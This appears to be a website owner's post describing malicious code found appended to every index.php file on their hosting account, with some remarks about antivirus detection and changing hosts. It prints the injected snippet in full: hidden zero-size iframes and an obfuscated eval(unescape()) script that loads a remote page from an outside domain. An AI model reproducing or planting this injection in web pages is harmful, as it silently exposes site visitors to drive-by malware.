<code><iframe src=”http://fredkidns.com/check/upd.php?t=562″ border=”0″ height=”0″ width=”0″></iframe></code>
<code><iframe src=”http://bestinlive.cn/i/index.php” border=”0″ height=”0″ width=”0″>
</iframe><script>eval(unescape(“%77%69%6e%64%6f%77%2e%73%
74%61%74%75%73%3d%27%44%6f%6e%65%27%3b%64%6f%63%75
%6d%65%6e%74%2e%77%72%69%74%65%28%27%3c%69%66%72%
61%6d%65%20%6e%61%6d%65%3d%62%30%20%73%72%63%3d%
5c%27%68%74%74%70%3a%2f%2f%66%72%65%64%6b%69%64%
6e%73%2e%63%6f%6d%2f%63%68%65%63%6b%2f%75%70%64%2
e%70%68%70%3f%74%3d%35%36%32%3f%27%2b%4d%61%74%68
%2e%72%6f%75%6e%64%28%4d%61%74%68%2e%72%61%6e%64%
6f%6d%28%29%2a%31%34%30%39%34%29%2b%27%39%33%64%
63%63%35%66%33%5c%27%20%77%69%64%74%68%d%32%36%3
1%20%68%65%69%67%68%74%3d%35%34%20%73%74%79%6c%6
5%3d%5c%27%64%69%73%70%6c%61%79%3a%20%6e%6f%6e%65
%5c%27%3e%3c%2f%69%66%72%61%6d%65%3e%27%29″)); </script></code>

note: the line is so long that i had to insert line breaks
and it was added at the end of each index.php file from my hosting account. I checked the domain names and fredkidns.com its suspended but the other one operates as an online pharmacy, i sent them an email telling about the problem , but i got no reply so far. I havent been able to decode the script to see what it was actually doing, but im sure it was bad. And i forget to tell you the infection was only discovered by Mcafee antiv, bellow is the picture of the error message.

I hope this deoesent happen again because i will be forced to change hosting , maybe i will chose hostgator i heard they are very ok.